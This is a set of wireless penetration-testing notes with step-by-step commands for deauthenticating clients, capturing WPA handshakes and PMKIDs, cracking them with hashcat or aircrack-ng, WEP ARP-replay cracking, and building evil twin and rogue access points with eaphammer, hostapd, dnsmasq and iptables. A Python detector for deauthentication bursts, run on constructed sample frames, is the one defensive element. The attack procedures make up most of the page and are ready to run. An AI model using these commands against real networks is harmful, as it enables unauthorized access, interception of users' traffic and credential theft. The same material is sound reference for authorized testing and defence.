Pentest_Notes

📡 Wireless Penetration Testing

Organized notes for wireless penetration testing. Last Updated: 2026-03-27


Overview

Wireless penetration testing focuses on assessing the security of Wi-Fi networks, including WPA/WPA2/WPA3 encryption, rogue access points, evil twin attacks, and client-side wireless attacks. This is occasionally relevant for internal engagements and physical assessments.


Reconnaissance

Checklist

Monitor Mode Setup

# Check wireless interfaces
iwconfig
ip link show

# Kill interfering processes
sudo airmon-ng check kill

# Start monitor mode
sudo airmon-ng start wlan0

# Verify
iwconfig wlan0mon

Network Discovery

# Scan all networks
sudo airodump-ng wlan0mon

# Target specific channel
sudo airodump-ng wlan0mon -c <CHANNEL> --bssid <BSSID> -w capture

# Scan 5GHz band
sudo airodump-ng wlan0mon --band a

Tools

| Tool | Purpose | Basic Command |
|---|---|---|
| airmon-ng | Monitor mode management | airmon-ng start wlan0 |
| airodump-ng | Wireless traffic capture | airodump-ng wlan0mon |
| aireplay-ng | Packet injection / deauth | aireplay-ng -0 5 -a <BSSID> wlan0mon |
| aircrack-ng | WPA/WEP key cracking | aircrack-ng -w rockyou.txt capture.cap |
| Kismet | Wireless network detector | kismet -c wlan0mon |
| Wifite2 | Automated wireless attacks | wifite --kill |
| hcxdumptool | PMKID capture | hcxdumptool -i wlan0mon --enable_status=1 |
| hcxpcapngtool | Convert captures to hashcat | hcxpcapngtool capture.pcapng -o hash.22000 |

Exploitation

WPA/WPA2 - 4-Way Handshake Capture & Crack

Checklist

# Step 1: Targeted capture
sudo airodump-ng wlan0mon -c <CHANNEL> --bssid <BSSID> -w handshake

# Step 2: Deauth a specific client (in a new terminal)
sudo aireplay-ng -0 5 -a <BSSID> -c <CLIENT_MAC> wlan0mon

# Step 3: Wait for "WPA handshake: <BSSID>" in airodump output

# Step 4: Crack with aircrack-ng
aircrack-ng -w /usr/share/wordlists/rockyou.txt handshake-01.cap

# Step 4 (Alternative): Crack with hashcat (faster on GPU)
# Convert cap to hccapx (legacy format, cracked with the deprecated -m 2500 mode)
cap2hccapx handshake-01.cap handshake.hccapx

# Or convert to hashcat 22000 format (newer)
hcxpcapngtool handshake-01.cap -o handshake.22000

# Crack
hashcat -m 22000 handshake.22000 /usr/share/wordlists/rockyou.txt
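The deauthentication step in this procedure is exactly what a wireless IDS watches for. As an added defensive example (not part of these notes), the function below flags any BSSID/station pair that receives a burst of deauthentication or disassociation frames in a short window; it runs over a constructed list of decoded 802.11 management frames whose dict field names are an assumed, simplified decode rather than a real library's output.

```python
from collections import defaultdict, deque

# 802.11 management-frame (type 0) subtypes that force a station off the AP.
DEAUTH_SUBTYPE = 12
DISASSOC_SUBTYPE = 10


def detect_deauth_bursts(frames, threshold=5, window=2.0):
    """Return one alert per (bssid, station) pair that receives at least
    `threshold` deauth/disassoc frames within any `window`-second span.

    Each frame is a dict with 'ts' (seconds), 'type', 'subtype', 'addr1'
    (receiver), 'addr2' (transmitter) and 'addr3' (BSSID). This shape is an
    assumption for the example; a pcap decoder would supply the same fields.
    """
    recent = defaultdict(deque)  # (bssid, station) -> timestamps inside window
    alerts, alerted = [], set()
    for f in sorted(frames, key=lambda fr: fr["ts"]):
        if f.get("type") != 0 or f.get("subtype") not in (DEAUTH_SUBTYPE, DISASSOC_SUBTYPE):
            continue  # beacons, probes and data frames are ignored
        key = (f["addr3"].lower(), f["addr1"].lower())
        q = recent[key]
        q.append(f["ts"])
        while q and f["ts"] - q[0] > window:  # slide the window forward
            q.popleft()
        if len(q) >= threshold and key not in alerted:
            alerted.add(key)  # report each pair once, not once per frame
            alerts.append({"bssid": key[0], "station": key[1],
                           "first_seen": q[0], "count": len(q)})
    return alerts


# Constructed sample: two beacons, one benign deauth (a client leaving on its
# own), then eight forged deauths aimed at a single client within 0.7 s.
AP, CLIENT, ROAMER = "aa:bb:cc:dd:ee:01", "11:22:33:44:55:66", "de:ad:be:ef:00:01"
SAMPLE_FRAMES = [
    {"ts": 0.0, "type": 0, "subtype": 8, "addr1": "ff:ff:ff:ff:ff:ff", "addr2": AP, "addr3": AP},
    {"ts": 0.1, "type": 0, "subtype": 8, "addr1": "ff:ff:ff:ff:ff:ff", "addr2": AP, "addr3": AP},
    {"ts": 0.5, "type": 0, "subtype": DEAUTH_SUBTYPE, "addr1": AP, "addr2": ROAMER, "addr3": AP},
] + [
    {"ts": 1.0 + 0.1 * i, "type": 0, "subtype": DEAUTH_SUBTYPE, "addr1": CLIENT, "addr2": AP, "addr3": AP}
    for i in range(8)
]

if __name__ == "__main__":
    for a in detect_deauth_bursts(SAMPLE_FRAMES):
        print(f"deauth burst: bssid={a['bssid']} station={a['station']} "
              f"count={a['count']} from t={a['first_seen']:.1f}s")
```

Where the AP requires Protected Management Frames (802.11w), stations discard unauthenticated deauth frames, so such a burst is still visible in the air but has no effect; the detector matters most on networks that cannot enforce PMF.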

WPA/WPA2 - PMKID Attack (Clientless)

# Capture PMKID (no client needed!)
sudo hcxdumptool -i wlan0mon -o pmkid.pcapng --enable_status=1 --filtermode=2 --filterlist_ap=<BSSID>

# Convert to hashcat format
hcxpcapngtool pmkid.pcapng -o pmkid.22000

# Crack
hashcat -m 22000 pmkid.22000 /usr/share/wordlists/rockyou.txt

💡 Pro Tip: The PMKID attack doesn't require any clients to be connected, making it much more reliable than handshake capture.

WEP Cracking (Legacy)

# Capture IVs
sudo airodump-ng wlan0mon -c <CHANNEL> --bssid <BSSID> -w wep_capture

# Generate traffic (ARP replay)
sudo aireplay-ng -3 -b <BSSID> -h <YOUR_MAC> wlan0mon

# Crack when enough IVs captured (~40,000+)
aircrack-ng wep_capture-01.cap

WPA Enterprise - Evil Twin

# Using hostapd-mana or eaphammer
sudo python3 eaphammer --bssid <BSSID> --essid <SSID> --channel <CH> --interface wlan0mon --auth wpa-eap --creds

Automated Attacks with Wifite2

# Run wifite with all attacks
sudo wifite --kill

# Target specific network
sudo wifite --kill -e "TargetSSID"

Post-Exploitation

Checklist

# Connect to WPA network
wpa_passphrase "SSID" "password" > wpa.conf
sudo wpa_supplicant -i wlan0 -c wpa.conf -B
sudo dhclient wlan0

Rogue Access Point / Evil Twin

# Create a rogue AP with hostapd
# Configuration file: hostapd.conf
interface=wlan0mon
driver=nl80211
ssid=FreeWiFi
channel=6
hw_mode=g

# Start hostapd
sudo hostapd hostapd.conf

# Set up DHCP and routing for clients
sudo dnsmasq -C dnsmasq.conf
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

Common Pitfalls / Gotchas

| Adapter | Chipset | Monitor Mode | Packet Injection |
|---|---|:---:|:---:|
| Alfa AWUS036ACH | RTL8812AU | ✅ | ✅ |
| Alfa AWUS036AXML | MediaTek MT7921AU | ✅ | ✅ |
| TP-Link TL-WN722N v1 | Atheros AR9271 | ✅ | ✅ |
| Panda PAU09 | RT5572 | ✅ | ✅ |

References & Further Reading